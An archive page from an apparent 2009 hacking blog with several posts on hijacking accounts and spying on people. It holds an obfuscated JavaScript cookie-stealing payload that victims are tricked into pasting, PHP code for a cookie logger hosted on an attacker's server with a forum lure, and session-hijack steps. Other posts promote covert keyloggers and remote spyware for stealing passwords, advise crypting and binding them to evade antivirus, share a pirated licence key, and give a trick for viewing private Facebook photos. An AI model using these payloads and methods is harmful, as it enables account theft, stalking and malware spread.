Sunday, June 28, 2009

Hack orkut account - cookie hack


Are You curious to Hack orkut account?,here is the answer.
Procedure for Hacking orkut account cookie hack from mozilla firefox to hack gmail or orkut is given below.

"Hacking orkut account " or gmail by "stealing orkut account cookies" :

The post explains how one can steal cookies to hack orkut account or gmail account. No password cracking method required.


Update:This hack is now fixed by orkut and does not work now  but you can read it for  extending your knowledge you can see orkut hacking section for more Hacking tips

Steps to hack gmail or "Hacking orkut account by cookie hack " :-

1.Firstly you need have Mozilla firefox.
2.Download cookie editor plugin for Mozilla firefox from:

https://addons.mozilla.org/en-US/firefox/addon/573

3.You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:


javascript:nobody=replyForm;nobody.toUserId.value=33454211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


How to use orkut cookies script?

1. Replace your number "UserId.value=33454211"

How to Replace your Number
1. Go to your Orkut album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.


Your script will look like.


javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.

3.You'll get his orkut account cookie in your scrap book.

4.After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)

5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211).

Thats it your done with

Logout of your orkut and login again and you'll be in your victims Homepage.
Here is how you Hack orkut account by cookie hack

6.So remember guys...if you are having orkut account or having any other account....never use any suspicious script to prevent anyone from hacking/accessing with your orkut account

Technorati Tags: , , ,


.......

Friday, June 26, 2009

Nokia cell phone hacking codes

I had previously published an article on How to Spy a Cellphone,i though to publish some more Cellphone Hacks so Here are some of the Nokia cell phone hacking codes i am posting,almost all of them work
These 3 codes work on 90% of Nokia phones;




*#06#=Display the IMEI (Standard GSM command, works on all phones)
*#0000#=Display the firmware version and date


*#92702689#=Here you can view the S/N and the IMEI as well as the life timer (newer models). The date the phone left the factory and the date it was purchased. If your phone has been repaired the date of the repair is also visible. You will need to turn the phone off to exit this menu. Newer phones simply require you to press ok.

The following codes are specific to older series 40 phones; (Entering the following codes will restart the phone)
*4720#=Activates Half Rate, Half Rate is 5.6kbit/s and uses half the bandwidth at the cost of call quality. Network operators often activate half rate on overloaded towers during peak times to save costs.
#4720#=Deactivates Half Rate
*3370#=Activates Enhanced Full Rate, EFT attempts to match wire quality. The calls are 12.2kbit/s and are not supported by all operators. It is compatibale with the hightest AMR mode.
#3370#=Deactivates Enhanced Full Rate
*#746085685#=Display the SIM clock status

The following codes are phone specific or phase related;
*#7220#=Activate the GPRS PCCCH support (Packet Common Control Channel)
*#7230#=Deactivate the GPRS PCCCH support
*#7760#=Display the manufacturing serial number

This only works on the 3310 and 3330;
*#67705646#=Clear the operator logo, the logo will be reset to the default network operator logo.

The following codes work on newer series 40 & series 60/80 phones;
*#2820#=Display the Bluetooth MAC address (Phone must have a built in bluetooth adapter)
*#7370925538#=Reset the mobile wallet (Phone must have the mobile wallet feature)
*#7370#=Soft-format the memory (Symbian)
*#7780#=Reset to factory defaults, confirmation required (also known has a Hard-format), all phone contents will be wiped clean


Thursday, May 14, 2009

How to manually remove Trojan Horse

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system. 

Is trojan virus Dangerous?
The short answer is yes, and the long answer is sometimes, because there are near a thousand different trojan horse viruses and they all will most likely alter your computer in some way or another.

Working of Trojans!


In this tutorial i will tell you a method through which you can manually remove a Trojan horse,Sometimes  atrojan horse disables your antivirus and prevent any other Antivirus from being installed

1-Go to my computer
2-Drive c
3-Program Files
4-Common flies
5-Microsoft shared
6- Ms info or msinfo 32

 The virus might hide it self in startup so delete the temporarily internet file

Is there any way to prevent Trojan attack?

I have wrote an article on How to secure your network from trojans this will explain on How to keep Trojans out of your PC

Monday, April 6, 2009

How to hack into an email account - cookie logger

Well one of the question which is asked most to me is,"How to hack into an email account",So today i am posting a new way to hack into an email account,I am not posting this post to exite hackers but to make you aware of whats going around

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger

Step 1
 First you have to create a file which can capture a person's cookie.So follow the following process.

Download the script

Step 2

 Now you have to change "http://rafayhackingarticles.blogspot.com" to your your site, Remember one thing you should not upload the files into a directory.

Now open notepad and paste the script in it and save it as fun.gif

Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:



$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>


Step 4:Create a new Notepad File and Save it as logfile.txt

Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

www.ofees.net
www.t35.com
www.ripway.com

Step 5:Go to the victim forum and insert this code in the signature or a post :


[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]


So the person who click it will think it is fun.jpg but it redirects to fun.gif

Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt


step 7
 And something like this will be stored in your "logfile.txt"

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9



Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Now for this you will need a firefox addon named "Add and edit cookies"

Saturday, April 4, 2009

Remote pc spyware and hacking softwares



1. Sniper Spy (Remote Install Supported)


Editors Rating: 8/10



SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!
SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
4. Records any Password (Email, Login, Instant Messenger etc.)
5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall
For more information on this program and download details visit the following link
SniperSpy


2. Win Spy (Remote Install Supported)


Editors Rating: 7/10
Winspy.jpg picture by rbsoulhunter17
Winspy keylogger is a Complete Stealth Monitoring Package that can spy on both your Local PC and Remote PC. It includes Remote Install and Realtime Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard. A special hotkey is used to login and access the program. Users will not be able to terminate or uninstall Win-Spy.
Win-Spy Software operates in stealth mode. It will not appear in Windows Start, System Tray, Desktop, Task Manager or Add/Remove Programs.
Win Spy Features:
1. Monitor Chat Room (dual side) and web activity
2. Remote Monitor any Email
3. Remote Monitor children’s activity on any PC
4. Records any Password (Email, Login, Instant Messenger etc.)
5. Monitor Remote PC Webcam
For more information on this program and download details visit the following link
Win Spy




3.Mobile spy(Cellphone hacking) 


Editors Rating: 9/10


Mobile Spy - Windows Mobile, BlackBerry, Android and Symbian Smartphone Monitoring Software
  There exists many cell phone spy softwares on the market and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude Mobile Spy as one of best one.
Mobile Spy is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? If you’re really serious to spy on a cell phone then Mobile Spy is for you. Go grab Mobile Spy now and expose the truth.


To find why Mobile spy is the the best here is the complete review of mobile spy


How to view private facebook profiles

Learn how to view private facebook profiles
In post i will tell you how to view private facebook profiles,This latest hack proves that anyone in the world is able to view anyone’s private tagged pictures,This is why facebook is not privite is still open even after such publicity all over the web.Major security threat.
Have you ever wanted to see pictures of an enemy but you couldn’t because her or his facebook account was set to private. Well thats all going to change because I will show you very simple way to view private facebook profiles


Method:

1. Login in your Facebook Account
www.facebook.com

2. Search for the person

3. Find the persons ID # by Clicking on Send messages

Facebook photo hack


5. Copy and Replace the ID # to the link


http://www.facebook.com/photo.php?pid=1234567&id=[Person’s ID]&op=1&view=all&subj=[Person’s ID]

6. Copy and paste the link in your browser

7. You should be able to see 10-20 pictures before facebook denies you access.

Wednesday, April 1, 2009

keylogger to hack password - Aradamax keylogger

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file.This log file then can be used to hack anyones email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access or one can use this tool to hack someones hotmail, gmail, yahoo, msn or other email account password.


Keylogger to hack


Ardamax keylogger tutorial
will help you in installing Ardamax keylogger for hacking passwords. Remember, ardamax keylogger is detected as hacktool (virus) by most antivirus. So, dont forget to crypt and bind your keylogger file. If you have any problem in using Ardamax keylogger to hack email passwords, please mention it in comments


This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.


Keylogger Features:


* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.


* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.


* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!


* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.


* Network delivery - sends recorded logs through via LAN.


* Clipboard logging - capture all text copied to the Windows Clipboard.


* Visual surveillance - periodically makes screenshots and stores the compressed images to log.


* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP


* Security - allows you to protect program settings, Hidden Mode and Log file.


* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.


* Application monitoring - keylogger will record the application that was in use that received the keystroke!


* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!


* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.


* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.


* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.


* It records every keystroke. Captures passwords and all other invisible text.


Other Features:


* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install


Download:
updated version of Aradamax keylogger
Password:rafayhackingarticles.blogspot.com


[Note, This is the Setup.exe from their site...I just found a working Name/Key so you can have the full version]



Code:
Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT


I have produced a post to Install a keylogger remotely which will help you alot.